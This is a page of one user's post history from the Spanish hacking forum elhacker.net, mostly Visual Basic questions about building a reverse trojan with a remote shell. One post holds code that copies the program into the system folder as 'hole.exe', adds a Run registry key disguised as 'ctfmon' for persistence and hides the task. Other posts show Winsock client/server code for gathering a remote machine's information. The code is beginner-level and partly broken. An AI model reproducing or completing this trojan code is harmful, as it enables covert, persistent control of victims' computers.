elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 [37] 38 39 40 41 42 43 44 45
361  Programación / Programación Visual Basic / Como creo un .exe con vb en: 22 Mayo 2009, 17:26 pm
Veran, como algunos ya saben estoy haciendo un troyano inverso, chiquitin y de bolsillo, y ahora me planteo esta duda

yo ya tengo creado el servidor y el cliente, y quiero que el cliente tenga la funcion de crear el servidor:

* primero que te diga a que ip quiere q se conecte el servidor
* despues que cree el .exe

me podriais ayudar a hacerlo? asi cuando ya lo haya acabado podre postearlo para descargar ya que si el server usa mi ip, los que pasen el server a futuras personas todas se conectarian a mi

gracias
362  Foros Generales / Foro Libre / Re: -Videos youtube- elhacker.net en: 20 Mayo 2009, 18:41 pm
joe e camionero de la m30 ese si que es bueno jaja

una vespa bien mirada.... ::)
363  Programación / Programación Visual Basic / Re: Error al copiar archivo (file not found) en: 16 Mayo 2009, 11:15 am
esa pàrte es la que he tenido que copiar ya que me daba muchos errores

estoy haciendo una obtencion de una shell remota, ya que me dio la idea al ver en el manual que poniendo tu paint, le ejecutabas el paint jeje, y se me ocurrio asi hacer una shell remota, lo unico copiado es este trozo, el que tengo que copiar y poner en el registro...etc

como seria con una api

sorry por mi escasa habilidad con vb, he empezado hace pocos dias

-------------------------------

edito, antes del filecopy he puesto un msbox y este es su resultado



y justo despues, aqui el error



----------------------

reedito de nuevo, al compilar ahora me deja, antes nose porque no, pero ahora si
364  Programación / Programación Visual Basic / Error al copiar archivo (file not found) en: 15 Mayo 2009, 15:26 pm
veran, estoy siguiendo un tutorial que anda por aqui sobre como crear un troyano, pero le estoy haciendo a m manera tomando alguna idea del manual

El error se me genera al copiar un archivo que se aloja en una variable, aqui esta el code:

Código:
Private Sub Form_Load()
Dim ip As String, port As Integer
Dim dioxis As String
Dim win, sys, residencia

ip = "192.168.6.100"
port = 666
dioxis = App.Path

ip = wsk.RemoteHost
port = wsk.RemotePort

If Right(dioxis, 1) <> "\" Then dioxis = dioxis & "\"
dioxis = dioxis & App.EXEName & ".exe"

Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)

win = LCase(win)
sys = LCase(sys)

FileCopy dioxis, sys & "\hole"
Name sys & "\hole" As sys & "\hole.exe"

Set residencia = CreateObject("WScript.Shell")

residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "ctfmon", sys & "\hole.exe"



App.TaskVisible = False
End Sub

he revisado y rerevisado el codigo pero no encuentro el error
365  Programación / Programación Visual Basic / Re: Problemas con dataarrival en: 15 Mayo 2009, 12:07 pm
ok, gracias, voy a averiguar el porque

hare lo que me has dicho blackzero+ lo imprimire de forma local en un textbox, luego de manera remota y despues si funciona bien, lo pasare a el control correspondiente, haber si me funciona

sino debere pasar los path de directorios y ficheros del cliente a otro formato para poder enviarlos ya que me han dicho que los drivelist, dirlist y filelist no se pueden enviar

es eso verdad?
366  Programación / Programación Visual Basic / Re: Problemas con dataarrival en: 14 Mayo 2009, 21:35 pm
ya me lei el de aprenda vb como si estuviera en primero pero ni siquiera toca controles winsock

me estoy leyendo manuales de todos lados antes de preguntar, no creo que por que pregunte haga daño

Citar
El error sucede por que no existe la ruta que pones desde el server en el cliente

aqui que te refieres, a que no hay un drivelist,dirlist y filelist con ese nombre? si,si lo hay, el error esta en otro lado, nose si te referiras a eso

gracias por tu ayuda
367  Programación / Programación Visual Basic / Re: Problemas con dataarrival en: 14 Mayo 2009, 17:41 pm
si, ahora mismo uso este que me dijeron %)% que no creo que se use jeje

la informacion que me es mandada va desde el cliente al servidor

por cierto, estoy intentando hacer esto

creo en el cliente un filelist un drivelist y un dirlist y les conecto los 3, y luego intento mandarlos asi:

Código:
Private Sub Command1_Click()
Dim datos As String
datos = txthst & "%)%" & txtso & "%)%" & drv.Drive & "%)%" & Dir.Path & "%)%" & file.Path
wsk.SendData datos
End Sub

luego despues en el servidor se reciben asi:

Código:
Private Sub wsk_dataarrival(ByVal bytestotal As Long)
Dim datos As String
Dim trozos() As String
wsk.GetData datos
trozos = Split(datos, "%)%")
txthst = trozos(0)
txtso = trozos(1)
[b]drv.Drive = trozos(2)
Dir.Path = trozos(3)
File.Path = trozos(3)[/b]
End Sub

en el server he llamado a los objetos igual que en el cliente, y al asociarlos con los datos enviados del drv.drive, dir.path y file.path me pasa esto:

368  Programación / Programación Visual Basic / Re: Problemas con dataarrival en: 14 Mayo 2009, 16:27 pm
Bueno, excuso este doble post debido a que encontre la respuesta, asi ayudare mas a otras futuras dudas:

Para poder obtener los datos, necesitas separarlos, el cliente debe de mandar los datos con algun caracter separador, por ejemplo "--" de manera que los datos lleguen asi:

dato1--dato2--dato3

luego con la funcion split(datos, "--")

los separas y obtienes arrays, el primer dato es el array 0 y asi sucesivamente

un ejemplo:

Código:
Private Sub wsk_dataarrival(ByVal bytestotal As Long)
Dim datos As String
Dim trozos() As String
wsk.GetData datos
trozos = Split(datos, "%)%")
txt1 = trozos(0)
txt2 = trozos(1)
txt3 = trozos(2)
txt4 = trozos(3)
End Sub
369  Programación / Programación Visual Basic / Re: Problemas con dataarrival en: 14 Mayo 2009, 11:48 am
este es mi codigo por ahora, este es el servidor:

Código:
Private Sub cdmescuchar_Click()
wsk.Close
wsk.Listen
lblstatus.Caption = "Escuchando..."
End Sub

Private Sub cmdcerrar_Click()
wsk.Close
lblstatus.Caption = "Apagado"
End Sub

Private Sub Form_Load()
wsk.LocalPort = 666
End Sub

Private Sub wsk_connectionRequest(ByVal requestID As Long)
If MsgBox(wsk.RemoteHostIP & "esta intentando conectarse", vbQuestion + vbYesNo, "Conexion entrante") = vbYes Then
wsk.Close
wsk.Accept requestID
Else
wsk.Close
Call cmdescuchar_click
End If
End Sub

Ahora que tendria que poner un evento, asi?

Código:
private Sub wsk_dataarrival(byval bytestotal as long)
'Aqui que tendria que poner?
end sub


lo que pasa es que, te llega la info con el delimitador %)% ok, luego usas split asi:

Código:
private sub wsk_dataarrival(byval bytestotal as long)
dim datos as string
Function Split(
   ByVal datos As String,
   Optional ByVal Delimiter As String = "%)%",
   Optional ByVal Limit As Integer = -1,
   Optional ByVal Compare As CompareMethod = CompareMethod.Binary
) As String()
wsk.getdata datos(0)
texip.text = datos(0)
ahi, si la ip fuese el primer dato cortado, me lo daria?
370  Programación / Programación Visual Basic / Problemas con dataarrival en: 14 Mayo 2009, 00:14 am
Veran, intento realizar un proyecto que recopile la mayor inforamcion posible del equipo remoto

estoy haciendo un server y un cliente

quiero que,cada dato que me mande, ejemplo, la ip, nombre de host, sistema operativo, me coloque cada cosa en su correspondiente textbox, la ip en un lado, el hostname en otro...etc

la cosa es que yo se coger los datos con el data arrival, pero como hago para que cada dato vaya a su textbox correspondiente? ya que todo llega de sopetón


gracias, me ayudariais mucho si me lo dijeseis
Páginas: 1 ... 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 [37] 38 39 40 41 42 43 44 45
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines